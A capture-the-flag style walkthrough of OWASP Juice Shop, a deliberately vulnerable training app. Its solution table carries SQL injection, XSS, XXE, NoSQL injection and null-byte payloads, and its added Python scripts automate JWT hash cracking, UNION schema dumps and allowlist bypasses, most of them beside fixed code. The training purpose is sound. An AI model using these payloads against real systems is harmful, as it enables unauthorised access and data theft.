OWASP Juice Shop
November 9, 2021•3,019 words
This is how I solved some of the challenges listed on the OWASP Juice Shop score board; find the one that interests you by searching for its name in the table.

Challenge | Solution |
--- | --- |
Error Handling (Provoke an error that is neither very gracefully nor consistently handled.) | Request a URL of your choice that the application has no route for and see what comes back. Sloppy error handling is a great source of findings: here the error page reveals the framework in use, AND that alone solves the challenge. |
Score Board (Find the carefully hidden 'Score Board' page.) | Read the JavaScript included in every page: there is a mention of a score-board route. Try it as a URL (`/#/score-board`) and you are done! |
Bonus Payload (...) | Paste the payload given for this challenge into the search bar and trigger this fun experience. |
DOM XSS (Perform a DOM XSS attack with <iframe src="javascript:alert(xss )">.) | Paste the payload into the search bar and the job is done: the search term is written into the page as HTML, so XSS in the search bar is easy :) |
Zero Stars (Give a devastating zero-star feedback to the store.) | The form won't let you pick zero, so intercept the feedback request and set the rating value to 0. With Burp this is easy, barely an inconvenience. |
Payback Time (Place an order that makes you rich.) | Modify the request that adds an item to the basket and ask for a negative quantity; the server never checks the sign, so the total goes negative. Complete the checkout and enjoy your new free money. |
Privacy Policy (Read our privacy policy.) | Register an account and log in. The privacy policy is in the menu that appears once you are logged in. |
Login Admin (Log in with the administrator's user account.) | Log in with `' OR 1=1 -- -` as the email and anything you like as the password: the rest of the query is commented out, so the password doesn't matter, and the first user the query returns happens to be the administrator. |
Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.) | The token you receive when logging in is a JWT. Decode it (with jwt.io, for example) and you will find the whole user record, password hash included, inside the payload. Luckily the password isn't all that strong and the hash is plain MD5, so you can crack it with an online lookup and log in without any SQLi. |
Admin Section | You have admin credentials, but nothing seems different. There must be some secret section. I brute-forced it, honestly: tried "administrator", "admin" and "administration". Lucky, I guess. |
Five-Star Feedback (Get rid of all 5-star customer feedback.) | In the administration section, delete every 5-star review. |
Bully Chatbot (Receive a coupon code from the support chatbot.) | Bomb the chatbot with coupon requests using Repeater; after some attempts it gives up and hands you a 10% discount code (pEw8pf!Cal in my case; the code is generated from the current month, so yours will differ). |
Login MC SafeSearch (Log in with MC SafeSearch's original user credentials without applying SQL Injection or any other bypass.) | There is a video of this rapper sharing his login information. Just remember the password is the one he says at the start of the video, not the altered one you see on his screen. |
Confidential Document (Access a confidential document.) | There is a link in the terms of use that lets you download a file. The file itself is pointless, but the path is extremely interesting: open the directory it was served from (the ftp directory) and there is plenty of interesting information in there. |
Deprecated Interface (Use a deprecated B2B interface that was not properly shut down.) | The file upload in the Complaint section only accepts PDF and ZIP files, or so it seems. The JavaScript responsible for it also lists XML as a supported type, so in the file-name field of the upload dialog type `*.xml`, select an XML file and upload it, add a complaint message and you're done! |
Exposed Metrics (Find the endpoint that serves usage data to be scraped by a popular monitoring system.) | The name of the monitoring system is given to you, so google it and you will find the default path its scraper expects. It's a really basic guess as well. |
Outdated Allowlist (Let us redirect you to one of our crypto currency addresses which are not promoted any longer.) | In one of the files included in all pages (the main JS) there is a reference to an old redirect target pointing at a bitcoin address. Requesting that redirect solves this challenge. |
Repetitive Registration (Follow the DRY principle while registering a user.) | The check that the two passwords match is front-end only. Intercept the registration request, put two different passwords in it just for the sake of it and move on to the next challenge. |
Missing Encoding (Retrieve the photo of Bjoern's cat in "melee combat-mode".) | In the Photo Wall section one image is missing. Look at its URL: the `#` characters in the file name aren't encoded, which breaks the request because `#` starts the fragment of a URL. Replace them with their URL-encoded form `%23` and the picture loads. |
Meta Geo Stalking (Determine the answer to John's security question by looking at an upload of him to the Photo Wall and use it to reset his password via the Forgot Password mechanism.) | John posted a picture on the Photo Wall that depicts his favourite hiking spot. Download the image and look at its metadata: the GPS coordinates are still in there. Now this is the tricky part: jot down a few possible names for the spot, because finding the one the app accepts is not super easy. Once you have it, you can reset his password. |
Weird Crypto (Inform the shop about an algorithm or library it should definitely not use the way it does.) | Looking at password hashes, like the one I cracked earlier, it's clear the shop uses MD5 for password hashing. Let them know in the feedback section: a feedback that says "md5" is enough, and this challenge is done. |
View Basket (View another user's shopping basket.) | When you request your basket, check the request: there is an obvious basket ID in the URL you can tamper with, and it gives you access to other users' baskets. |
Visual Geo Stalking (Determine the answer to Emma's security question by looking at an upload of her to the Photo Wall and use it to reset her password via the Forgot Password mechanism.) | As with John's challenge, she uploaded a picture to the Photo Wall. This time look more carefully: there is something written on the first window from the left on the second floor. Zoom in hard enough and you will get the name of the company, which is also the answer to her security question. |
Security Policy (Behave like any "white-hat" should before getting into the action.) | As defined in the security.txt specification (RFC 9116), the file lives under the `.well-known` directory, so request `/.well-known/security.txt`. |
Reflected XSS (Perform a reflected XSS attack with <iframe src="javascript:alert(xss )">.) | The id parameter you see in the URL of the Track Order page (the small delivery truck icon) is reflected in the page, quite visibly. Put the payload into that parameter and it's done. |
Admin Registration (Register as a user with administrator privileges.) | During registration, modify the request and add the field "role" with value "admin" to the JSON body: the API accepts any attribute of the user model (classic mass assignment). |
Login Bender (Log in with Bender's user account.) | We know the login form suffers from SQLi, so a very basic `bender@juice-sh.op' -- -` in the email field is all you need. |
Login Jim (Log in with Jim's user account.) | Same as right above, except with Jim's email. |
CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.) | Intercept one feedback request and replay it quickly (Intruder or a Repeater tab group): the same CAPTCHA answer is accepted again and again, so ten copies within ten seconds pass this challenge. |
CSRF (Change the name of a user by performing Cross-Site Request Forgery from another origin.) | Use the website given in the hint to create an HTML form with a single input field named username and the value CSRF, submitting to the /profile endpoint. Open the page you just created while you are logged in (in a different tab) and it performs the CSRF attack against your own session. Note that a browser which defaults cookies to SameSite=Lax will not send the session cookie on a cross-site POST, so this needs a browser that doesn't. |
Product Tampering (Change the href of the link within the OWASP SSL Advanced Forensic Tool (O-Saft) product description into https://owasp.slack.com.) | Send a PUT request that modifies the description field as the challenge asks. To identify the product, watch the requests: its product ID is 9. |
Bjoern's Favorite Pet (Reset the password of Bjoern's OWASP account via the Forgot Password mechanism with the original answer to his security question.) | Look up Bjoern Kimminich: he posts about his cat quite a bit and sometimes slips the name into his posts, oops. Use it to reset the password. |
Forged Review (Post a product review as another user or edit any user's existing review.) | Intercept the request that creates a review and change the author field to another user's email. |
Reset Jim's Password (Reset Jim's password via the Forgot Password mechanism with the original answer to his security question.) | Everything Jim ever did on the platform is a reference to Captain Kirk, who has a brother whose middle name is Samuel. That is the answer to the security question; use it to reset his password. |
Upload Size (Upload a file larger than 100 kB.) | Send a file larger than 100 kB directly to /file-upload with a tool like Burp or Postman, in a multipart parameter named file. |
Upload Type (Upload a file that has no .pdf or .zip extension.) | The restriction is strictly front-end; no problem if you send the upload from a tool like Burp or Postman. Easy bypass. |
Manipulate Basket (Put an additional product into another user's shopping basket.) | An example of HTTP parameter pollution: the application's behaviour is not well defined if you write BasketId twice in the JSON body of the request that adds a product to your basket. The first occurrence passes the check because you set it to your own basket's ID; the second one, set to the victim's basket, is the one actually used, so the item lands in their basket. |
GDPR Data Erasure (Log in with Chris' erased user account.) | I could not find any reference to Chris's email, but the fact that he has an erased account gives us the opportunity to try this injection in the login form: `' OR deletedAt IS NOT NULL -- -`. Fortunately he is the first user returned by this query, so we pass the challenge. |
Login Amy (Log in with Amy's original user credentials. (This could take 93.83 billion trillion trillion centuries to brute force, but luckily she did not read the "One Important Final Note")) | Search Google for the very specific sentence about cracking time: it takes you to a brute-force key-space calculator. At the end of that page there is a section explaining why password padding is not a good idea. Amy did not read it and used her husband's name (with the i leeted) followed by a few trailing dots. |
Privacy Policy Inspection (Prove that you actually read our privacy policy.) | Inside the privacy policy some words trigger a visual effect, like a fire in the background. Combine these words into a URL, using each word as a path segment (just/like/this), and visit it to unlock the challenge. |
Forged Feedback (Post some feedback in another users name.) | Change the UserId in the feedback request to that of a different user and you are done. |
Deluxe Fraud (Obtain a Deluxe Membership without paying for it.) | The button to pay with your wallet is disabled. Remove the disabled attribute in the page source and click it. Watch the request: it contains a JSON key-value parameter for the payment mode. Set the value to an empty string and the shop gives you the membership for free. |
API-only XSS (Perform a persisted XSS attack with <iframe src="javascript:alert( xss )"> without using the frontend application at all.) | Create a product with a POST to /api/Products (send your Authorization token with it). Three fields are required in the JSON: name, description and price. The name is properly escaped, but I am afraid the same cannot be said for the description field, which triggers your lovely XSS. |
Client-side XSS Protection (Perform a persisted XSS attack with <iframe src="javascript:alert( xss )"> bypassing a client-side security mechanism.) | Catch the request generated when a user creates an account. There is a client-side filter on the email field, but if you replay the request with Burp or build it in Postman you can put the specified payload into the email and move on to the next challenge. Side note: the XSS fires in the administration page, where the user list is rendered. |
XXE Data Access (Retrieve the content of C:\Windows\system.ini or /etc/passwd from the server.) | Create an XML file that declares an external entity pointing at one of these two files and references that entity in the document body. Remember, you can upload XML files in the complaint section, as we did in a previous challenge. |
Christmas Special (Order the Christmas special offer of 2014.) | Check the search bar: it is susceptible to SQL injection. Judging from the error messages, you can build a working payload of the form `'))-- -`, which cuts off the filter that hides deleted products and returns the full list, Christmas special included. Intercept the request performed whenever you add a product to the basket and modify it, asking for the Christmas special by its ID. Perform the checkout to pass the challenge. |
Database Schema (Exfiltrate the entire DB schema definition via SQL Injection.) | We know from the previous challenge that we have SQLi on the q parameter of the search. With a UNION SELECT, first find out how many columns the query returns (`blabla')) UNION SELECT 1,2,3,4,5,6,7,8,9 FROM sqlite_master-- -` works, so nine). Then we just need the sql column of sqlite_master, so substitute one of the numbers that the UI actually displays (the second, rendered as the product name) with sql. |
Login Support Team (Log in with the support team's original user credentials without applying SQL Injection or any other bypass.) | Searching the main JS file reveals the following message: "@echipa de suport: Secretul nostru comun este încă Caoimhe cu parola de master gol!" (Romanian: "@support team: our shared secret is still Caoimhe with an empty master password!"). Search the name: it's Irish, and there is a redhead in the About Us section (stereotypes?). Use her image as the key file, with an empty master password, to open the .kdbx file from the ftp directory and obtain the password to log in as the support team. |
Access Log (Gain access to any access log file of the server.) | A directory bust should easily lead you to /support/logs. Download the log file there to pass the challenge. |
CSP Bypass (Bypass the Content Security Policy and perform an XSS attack with <script>alert(xss )</script> on a legacy page within the application.) | The "link an image" function on the profile page lets you tamper with the CSP: the URL you supply ends up in the Content-Security-Policy header of the legacy profile page, so link a non-existent URL with an extra directive appended to it. Make that directive allow unsafe inline scripts and put an XSS payload in the username field. Careful though, there is a filter on the username. Not the smartest of filters: `<<w\|wscript>alert('XSS')</script>` bypasses it, because it strips the inner junk once and leaves a clean script tag behind. |
Leaked Unsafe Product (Identify an unsafe product that was removed from the shop and inform the shop which ingredients are dangerous.) | An OSINT challenge. Everything starts from the SQLi that revealed all the products, including the removed ones. Search online for the ingredient list of the dangerous item and you should find a page where a user suggests some exotic fruits made their way into this product. There is a link to a page with the full list of ingredients; send the support team the two that appear to be fatal when combined. |
Easter Egg (Find the hidden easter egg.) | In the ftp section there is a file named eastere.gg. You can only download .md and .pdf files, but with a Poison Null Byte you can bypass this check: request `eastere.gg%2500.md`, for example. The extension check sees the .md suffix, while the file name actually used is cut off at the (double-URL-encoded) null byte. |
Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.) | The row above shows how to perform a null-byte poisoning attack, so you kill two birds with one stone. |
Nested Easter Egg (Apply some advanced cryptanalysis to find the real easter egg.) | Take the content of the easter egg: it's clearly some base encoding, and very easily base64. Once decoded it looks like a URL, but it just doesn't work. Apply ROT13 to it and you get /the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg, which seems just about right. |
Expired Coupon (Successfully redeem an expired campaign coupon code.) | Inside the main JS file, search for "campaign": there is a list of campaign coupon codes along with a validation routine that checks, in the browser, whether the coupon is still valid. Pick one, convert its JS timestamp (milliseconds since the epoch) to a date and set your system clock so that the coupon is valid again (turn NTP off first with `timedatectl set-ntp off`, then run `date -s "<the date you need>"`). Complete the checkout and you are done. |
Forgotten Developer Backup (Access a developer's forgotten backup file.) | There is a .bak file in the ftp directory; use the null-byte poisoning technique to retrieve it and complete the challenge. |
Forgotten Sales Backup (Access a salesman's forgotten backup file.) | Same technique as right above, just on the right file (coupons_...). |
Login Bjoern (Log in with Bjoern's Gmail account without previously changing his password, applying SQL Injection, or hacking his Google account.) | Bjoern used OAuth. Search for "oauth" in the main JS: you will find that the application, needing to set a password for OAuth users, simply takes the email, reverses it and base64-encodes the result. Do the same with his Gmail address and you have the password you need. |
GDPR Data Theft (Steal someone else's personal data without using Injection.) | Check the track-order request and notice that the user's email shown there has all its vowels removed, a rather naive pseudonymisation. Create two users whose emails collide once the vowels are stripped (so one of them collides with the victim's). Now export your data in the privacy section and you also get the order tracking of the other user. |
Misplaced Signature File (Access a misplaced SIEM signature file.) | Read the appropriate file in the ftp directory using the same null-byte poisoning trick as before (the file is "suspicious..."). |
NoSQL DoS (Let the server sleep for some time. (It has done more than enough hard work for you)) | The server shows product reviews. Look at the GET request that fetches them and replace the product ID with `sleep(2000)`: the ID is dropped into a server-side query expression, so the sleep runs on the server. |
NoSQL Manipulation (Update multiple product reviews at the same time.) | Notice the PATCH request sent when editing a review. Change the body to `{"id":{"$ne":-1},"message":"NoSQL Injection!"}`: the id is used as the query filter verbatim, so the $ne operator matches every review. |
Allowlist Bypass (Enforce a redirect to a page you are not supposed to redirect to.) | There is a redirect when you click on the GitHub link in the navigation pane on the left. The allowlist check only verifies that an allowed URL appears somewhere in the target, so a payload like `/redirect?to=http://x.com?url=https://github.com/bkimminich/juice-shop` passes the check and sends you to x.com. |
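The Password Strength and Weird Crypto rows decode the login JWT and crack the MD5 hash by hand. The script below is an added example (mine, not part of the original write-up or of the Juice Shop code base) that does the same offline: it builds a constructed token shaped like the shop's (a user record with its MD5 password hash under "data", placeholder signature), decodes the payload without checking the signature, and runs the hash against a small constructed wordlist. The email, password and wordlist are all made up.

```python
import base64
import hashlib
import json
from typing import Iterable, Optional


def _b64url_decode(segment: str) -> bytes:
    """Base64url decode, re-adding the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_payload(token: str) -> dict:
    """Return a JWT's claims WITHOUT verifying the signature.

    A JWT is header.payload.signature, each base64url-encoded. Only the
    signature depends on the key; the payload is readable by anyone holding
    the token, which is why a password hash must never be put in it.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated JWT segments")
    header = json.loads(_b64url_decode(parts[0]))
    if "alg" not in header:
        raise ValueError("first segment is not a JWT header")
    return json.loads(_b64url_decode(parts[1]))


def crack_md5(hash_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Unsalted MD5: one pass over a wordlist is all it takes."""
    target = hash_hex.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode("utf-8")).hexdigest() == target:
            return candidate
    return None


def recover_password_from_token(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """The two steps from the write-up chained: decode, then crack the hash."""
    claims = decode_jwt_payload(token)
    return crack_md5(claims["data"]["password"], wordlist)


def make_sample_token(password: str) -> str:
    """CONSTRUCTED token with the shape the shop's token has: a user record
    under "data", MD5 password hash included. The signature is a placeholder
    because decode_jwt_payload never checks it."""
    def dumps(obj) -> bytes:
        return json.dumps(obj, separators=(",", ":")).encode("utf-8")

    header = {"typ": "JWT", "alg": "RS256"}
    payload = {
        "status": "success",
        "data": {
            "id": 1,
            "email": "admin@example.test",  # constructed, not a real account
            "password": hashlib.md5(password.encode("utf-8")).hexdigest(),
            "role": "admin",
        },
        "iat": 1636416000,
    }
    return ".".join([_b64url_encode(dumps(header)),
                     _b64url_encode(dumps(payload)),
                     _b64url_encode(b"placeholder-signature")])


# Constructed mini wordlist; a real run would use rockyou.txt or an online lookup.
SAMPLE_WORDLIST = ["123456", "password", "letmein", "sunshine1", "qwerty"]

if __name__ == "__main__":
    token = make_sample_token("sunshine1")
    print(json.dumps(decode_jwt_payload(token)["data"], indent=2))
    print("cracked:", recover_password_from_token(token, SAMPLE_WORDLIST))
```

Point the same functions at a real token and a real wordlist and the only thing that changes is the running time; the shape of the problem (secret material inside an unencrypted payload, hashed without a salt or a slow KDF) is what the Weird Crypto feedback is about.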
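The Login Admin, Login Bender, GDPR Data Erasure, Christmas Special and Database Schema rows all ride on the same two string-built SQLite queries. The script below is an added example (mine, not the project's code): it rebuilds those two queries in the shape the rows describe over a constructed in-memory database, runs each payload from the table against them, automates the column-counting step of the UNION-based schema dump, and shows the parameterised query that closes the hole. Table contents, emails and passwords are constructed.

```python
import hashlib
import sqlite3
from typing import List, Optional


def md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """CONSTRUCTED in-memory stand-in for the shop's SQLite database:
    the table/column layout the queries below expect, with made-up rows."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, "
                 "password TEXT, role TEXT, deletedAt TEXT)")
    conn.execute("CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, "
                 "description TEXT, price REAL, deluxePrice REAL, image TEXT, "
                 "createdAt TEXT, updatedAt TEXT, deletedAt TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?,?,?,?,?)", [
        (1, "admin@example.test", md5("adminpw"), "admin", None),
        (2, "bender@example.test", md5("benderpw"), "customer", None),
        (3, "chris@example.test", md5("chrispw"), "customer", "2021-01-01"),  # erased account
    ])
    conn.executemany("INSERT INTO Products VALUES (?,?,?,?,?,?,?,?,?)", [
        (1, "Apple Juice", "Fresh", 1.99, 0.99, "a.jpg", "t", "t", None),
        (2, "Christmas Special 2014", "Seasonal", 9.99, 9.99, "c.jpg", "t", "t", "2014-12-27"),
    ])
    return conn


def login_vulnerable(conn, email: str, password: str) -> Optional[dict]:
    """String-built query in the shape the login form uses; the app treats
    the FIRST row returned as the logged-in user."""
    query = (f"SELECT * FROM Users WHERE email = '{email}' "
             f"AND password = '{md5(password)}' AND deletedAt IS NULL")
    row = conn.execute(query).fetchone()
    return dict(row) if row else None


def login_fixed(conn, email: str, password: str) -> Optional[dict]:
    """Same query, but the values travel as bound parameters, never as SQL."""
    row = conn.execute("SELECT * FROM Users WHERE email = ? AND password = ? "
                       "AND deletedAt IS NULL", (email, md5(password))).fetchone()
    return dict(row) if row else None


def search_vulnerable(conn, q: str) -> List[dict]:
    """String-built product search; '))-- - cuts off the deletedAt filter."""
    query = (f"SELECT * FROM Products WHERE ((name LIKE '%{q}%' OR description "
             f"LIKE '%{q}%') AND deletedAt IS NULL) ORDER BY name")
    return [dict(r) for r in conn.execute(query).fetchall()]


def find_union_column_count(conn, max_cols: int = 15) -> Optional[int]:
    """Step 1 of the schema dump: grow the UNION SELECT until SQLite stops
    complaining that both sides have a different number of result columns."""
    for n in range(1, max_cols + 1):
        nums = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(conn, f"zzz')) UNION SELECT {nums} FROM sqlite_master-- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_schema(conn) -> List[str]:
    """Step 2: put sqlite_master.sql into the column the UI renders (the 2nd, name)."""
    n = find_union_column_count(conn)
    if n is None:
        return []
    cols = ["1"] * n
    cols[1] = "sql"
    rows = search_vulnerable(conn, f"zzz')) UNION SELECT {','.join(cols)} FROM sqlite_master-- -")
    return [r["name"] for r in rows if r["name"]]


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "' OR 1=1-- -", "anything")["email"])            # the admin
    print(login_vulnerable(db, "' OR deletedAt IS NOT NULL-- -", "x")["email"])  # the erased user
    print([p["name"] for p in search_vulnerable(db, "'))-- -")])               # deleted product too
    print(find_union_column_count(db), dump_schema(db))
    print(login_fixed(db, "' OR 1=1-- -", "anything"))                          # None
```

The column-count loop is the general form of the "try 1,2,3,...,9" step in the Database Schema row: it works against any table, not only the nine-column Products table, as long as the error for a mismatched UNION is observable.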
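The Manipulate Basket row describes the duplicate-BasketId trick. As an added example (a model of the behaviour that row describes, not Juice Shop's own code), here is a handler that walks the raw JSON body key by key, validates the first BasketId and writes the last, next to a version that refuses bodies with duplicate keys and takes the basket from the session instead. The request bodies and product ID are constructed.

```python
import json
from typing import Any, Dict, List, Tuple

Pairs = List[Tuple[str, Any]]


def add_basket_item_vulnerable(raw_body: str, user_basket_id: int) -> Dict[str, Any]:
    """Model of the polluted-parameter handler: every occurrence of a key is
    kept, the FIRST BasketId is checked against the caller's basket and the
    LAST one is what gets written. (Flat bodies only: the hook turns every
    JSON object into a list of pairs.)"""
    pairs: Pairs = json.loads(raw_body, object_pairs_hook=lambda p: p)
    basket_ids = [v for k, v in pairs if k == "BasketId"]
    product_ids = [v for k, v in pairs if k == "ProductId"]
    quantities = [v for k, v in pairs if k == "quantity"]
    if not (basket_ids and product_ids and quantities):
        return {"status": 400, "error": "missing field"}
    if int(basket_ids[0]) != int(user_basket_id):
        return {"status": 401, "error": "Invalid BasketId"}
    return {"status": 200, "item": {"BasketId": basket_ids[-1],
                                    "ProductId": product_ids[-1],
                                    "quantity": quantities[-1]}}


def _reject_duplicate_keys(pairs: Pairs) -> Dict[str, Any]:
    keys = [k for k, _ in pairs]
    dupes = sorted({k for k in keys if keys.count(k) > 1})
    if dupes:
        raise ValueError(f"duplicate keys in JSON body: {dupes}")
    return dict(pairs)


def add_basket_item_fixed(raw_body: str, user_basket_id: int) -> Dict[str, Any]:
    """Parse once into one object, refuse duplicate keys, and never trust a
    client-supplied BasketId: the basket is the one bound to the session."""
    try:
        body = json.loads(raw_body, object_pairs_hook=_reject_duplicate_keys)
    except ValueError as exc:  # JSONDecodeError is a ValueError as well
        return {"status": 400, "error": str(exc)}
    if "ProductId" not in body or "quantity" not in body:
        return {"status": 400, "error": "missing field"}
    if "BasketId" in body and int(body["BasketId"]) != int(user_basket_id):
        return {"status": 401, "error": "Invalid BasketId"}
    return {"status": 200, "item": {"BasketId": int(user_basket_id),
                                    "ProductId": body["ProductId"],
                                    "quantity": body["quantity"]}}


# Constructed request bodies: the attacker owns basket 1, the victim basket 2.
HONEST_BODY = '{"ProductId": 14, "BasketId": 1, "quantity": 1}'
POLLUTED_BODY = '{"ProductId": 14, "BasketId": 1, "quantity": 1, "BasketId": 2}'
FOREIGN_BODY = '{"ProductId": 14, "BasketId": 2, "quantity": 1}'

if __name__ == "__main__":
    print(add_basket_item_vulnerable(POLLUTED_BODY, 1))  # 200, item lands in basket 2
    print(add_basket_item_fixed(POLLUTED_BODY, 1))       # 400, duplicate key rejected
```

Note what a standard parser would have hidden: `json.loads` without the hook keeps only the last value of a repeated key, so a handler that validated the parsed object would have failed closed here. The bug needs a path that looks at the first copy and a path that uses the last.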
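The Outdated Allowlist and Allowlist Bypass rows both come down to how the redirect allowlist is checked. As an added example (not the project's code), here is a substring check of the kind the `?url=` payload defeats, next to a check that parses the target and compares scheme, host and path against each allowlist entry. The GitHub URL is the one from the table; the second allowlist entry and the test targets are constructed.

```python
from typing import List
from urllib.parse import urlparse

# Constructed allowlist: the GitHub entry is the one the write-up mentions, the
# explorer entry stands in for the "no longer promoted" crypto address.
ALLOWLIST: List[str] = [
    "https://github.com/bkimminich/juice-shop",
    "https://explorer.example/address/old-campaign-address",
]


def is_allowed_vulnerable(to: str) -> bool:
    """Substring match: true as long as an allowlisted URL appears ANYWHERE in
    the target, query string and path included."""
    return any(allowed in to for allowed in ALLOWLIST)


def is_allowed_fixed(to: str) -> bool:
    """Parse the target and require scheme, host and path to line up with an
    allowlist entry (same path, or a sub-path of it). Scheme-relative and
    non-http targets are refused outright."""
    try:
        target = urlparse(to)
    except ValueError:
        return False
    if target.scheme not in ("http", "https") or not target.netloc:
        return False
    for allowed in ALLOWLIST:
        entry = urlparse(allowed)
        same_origin = (target.scheme == entry.scheme
                       and target.netloc.lower() == entry.netloc.lower())
        same_path = (target.path == entry.path
                     or target.path.startswith(entry.path.rstrip("/") + "/"))
        if same_origin and same_path:
            return True
    return False


def landing_host(to: str) -> str:
    """Where the browser actually ends up after the redirect."""
    return urlparse(to).netloc.lower()


# Constructed targets: the legitimate link, the write-up's bypass, and a second
# shape of the same bug (allowed URL smuggled in the path instead of the query).
LEGIT = "https://github.com/bkimminich/juice-shop"
QUERY_SMUGGLE = "http://x.com?url=https://github.com/bkimminich/juice-shop"
PATH_SMUGGLE = "https://evil.example/https://github.com/bkimminich/juice-shop"

if __name__ == "__main__":
    for to in (LEGIT, QUERY_SMUGGLE, PATH_SMUGGLE):
        print(f"{to}\n  substring check: {is_allowed_vulnerable(to)}  "
              f"parsed check: {is_allowed_fixed(to)}  lands on: {landing_host(to)}")
```

The parsed check fixes the bypass but not the Outdated Allowlist finding: a stale entry such as the explorer URL still validates, because the list itself is the problem there. Pruning entries that are no longer promoted is a separate, manual fix.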